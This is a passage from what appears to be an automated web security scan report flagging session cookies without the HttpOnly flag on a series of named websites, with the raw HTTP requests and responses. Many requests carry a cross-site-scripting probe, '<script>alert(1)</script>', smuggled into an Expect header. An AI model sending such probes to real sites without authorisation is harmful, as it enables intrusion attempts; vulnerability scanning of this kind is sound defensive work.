HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:29:35 GMT
Content-Length: 11478
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQSSSDT=LMAOJGLAHOCFHPMLAIMAIALM; path=/
Cache-control: private

<html>
<head>
<title>HLSM's Electronic Parts Finder</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-fami
...[SNIP]...
17.13. http://www.hotwheelscollectors.com/HWCErrorPage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:53 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=arhh2v55sforoczguhtjd2jm; path=/
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0ec3660;expires=Mon, 02-May-11 03:22:24 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 dfw107003 (MII-APC/2.0)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
17.14. http://www.ixfr.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ixfr.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ixfr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:00:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQCBAABQ=OFGNNCNCABNIINAGOJJGHJMA; path=/
Cache-control: private

17.15. http://www.jea.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jea.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jea.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:15 GMT
Location: http://www.jea.com/favicon.ico
Content-Length: 151
Content-Type: text/html
Set-Cookie: JEA=RedirectUrl=%2Ffavicon%2Eico; path=/
Set-Cookie: ASPSESSIONIDAAQDTTRB=MBABJKGAFDIDNHCKJIHEPJBC; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.jea.com/favicon.ico">here</a>.</body>
17.16. http://www.lenox.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:48:38 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=18008498;expires=Tue, 23-Apr-2041 23:48:39 GMT;path=/
Set-Cookie: CFTOKEN=3f48e32aae5ed302-ADF6BB1C-F0A7-563B-641D8D97D77EEE98;expires=Tue, 23-Apr-2041 23:48:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
17.17. http://www.lsitools.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lsitools.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lsitools.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: 1BC
X-Powered-By: ASP.NET
Content-Length: 2821
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASDCTAC=FIGHIEJCAKIFODBPPKNPODEM; path=/
Cache-control: private

<html>
<head>
   <title>LSI Tools | Expert solutions for the vacation rental industry.</title>
   <meta NAME="keywords" CONTENT="Expert Solutions for the Vacation Rental Industry">
   <meta NAME="descri
...[SNIP]...
17.18. http://www.milwaukee.gov/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.milwaukee.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.milwaukee.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 143
Content-Type: text/html
Location: /PageNotFound20051.htm
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQSBTDQST=BHOEPDGCMLHMEMHJBPAGNPHM; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:48:21 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/PageNotFound20051.htm">here</a>.</body>
17.19. http://www.muschealth.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.muschealth.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.muschealth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Length: 3638
Content-Type: image/x-icon
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=49938950;expires=Wed, 24-Apr-2041 00:39:40 GMT;path=/
Set-Cookie: CFTOKEN=b89d06571cf50fa6-AE2572C1-23AE-EC0F-20992C2498FE81E8;expires=Wed, 24-Apr-2041 00:39:40 GMT;path=/
Set-Cookie: SESESSIONID=E2FC3C05A06720867BE11E7034084CAA;path=/
Set-Cookie: SESESSIONCODE=E9EE53714B49CE7CE74D917F84674BF5;path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:39:40 GMT
Set-Cookie: NSC_tjuffyfd-fyu=ffffffff831fd44345525d5f4f58455e445a4a423660;expires=Mon, 02-May-2011 15:39:40 GMT;path=/

..............h...&... ..............(....... ...........@.............................9......U........k......y1..i............R...........{...B.......................c..]........c......}9...........
...[SNIP]...
17.20. http://www.mylearningplan.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mylearningplan.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylearningplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 492
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=%7BB37083AE%2D04D4%2D461A%2DB2D9%2D387A5E72C198%7D; domain=.mylearningplan.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:09 GMT

<div id='section_D'>
           <h1><b>Error Message</b></h1>
<div class='alert'>
<p></p>
<p></p>
<p align='center'><strong>Error: An Error Has occurred on this page</strong></p>
<p></p>
<p align='cent
...[SNIP]...
17.21. http://www.mypearsonstore.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mypearsonstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mypearsonstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Sun, 01 May 2011 23:16:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: session=id=1f7711ae-12b1-466f-b34a-a48a84f6ed3d&db=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Error</title><meta http
...[SNIP]...
17.22. http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.newswiretoday.com
Path:   /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/ HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8kel0h54alrfeeq12er0b6lst4; path=/
Set-Cookie: phpjob_aff_id=0; expires=Mon, 01-Aug-2011 04:00:00 GMT
Set-Cookie: phpjob_lng=english; expires=Mon, 01-Aug-2011 04:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 45114

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newswire / The Netherlands #1 Real Estate Company Selects OUTSCAN for Vulnerability Assessment and Management -
...[SNIP]...
17.23. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WPS/shoppingcart/checkout/Viewcart.asp?expand=1019 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:39 GMT
Content-Length: 543
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=PLJKBIKAHEBHCEPODDOPNNGN; path=/
Cache-control: private


<html>
<head>
<title>World of Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border=
...[SNIP]...
17.24. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:21:43 GMT
Content-Length: 541
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=MGKKBIKAJLALKLHMGNHCJDNK; path=/
Cache-control: private


<html>
<head>
<title>Xtreme Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border="0
...[SNIP]...
17.25. http://www.ptcb.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ptcb.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ptcb.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 01 May 2011 23:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=4880537;domain=.ptcb.org;expires=Tue, 23-Apr-2041 23:55:51 GMT;path=/
Set-Cookie: CFTOKEN=39658861;domain=.ptcb.org;expires=Tue, 23-Apr-2041 23:55:51 GMT;path=/
location: https://www.ptcb.org//AM/Template.cfm?Section=Home1&WebsiteKey=9d90bd98-be45-4b90-ae8c-25ab71fa0923
Content-Type: text/html; charset=UTF-8

<!-- Source Code Copyright .. 2005 by Advanced Solutions International, Inc. -->
17.26. http://www.securom.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securom.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.securom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 167
Content-Type: text/html
Location: http://www.securom.com:80/download/favicon.ico
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAABRTTS=GHLMJLDCHNEHOGHADNDFFCHL; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:22:24 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.securom.com:80/download/favicon.ico">here</a>.</body>
17.27. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webstatshq/www.onlinemicrofiche.com HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=doqq36j3lfipqlju261e9vveq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 57234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>www.onlinemicrofich
...[SNIP]...
17.28. http://www.seoq.com/wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=dmrsl377t3kamtrburghhgs7h7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.29. http://www.seoq.com/wp-content/uploads/2008/07/plastic-business-card.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/plastic-business-card.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/plastic-business-card.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:44:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=bsdds49l14shn4f75a79hscdv7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:44:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.30. http://www.seoq.com/wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=thqpn70su4cv7ht7rbrref0ja4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.31. http://www.seoq.com/wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=dler6f6f9e9el2gd44qef454c7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.32. http://www.seoq.com/wp-content/uploads/2008/07/wordpress-for-iphone.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/wordpress-for-iphone.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/wordpress-for-iphone.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=a90bq0ka7dbph6a2c3i6ra6757; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.33. http://www.seoq.com/wp-content/uploads/2008/07/wordpress-users-guide.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/wordpress-users-guide.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/wordpress-users-guide.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=5uvpfm92vhm8sjc050353p2280; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
17.34. http://www.seoq.com/wp-content/uploads/2008/08/before-en.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
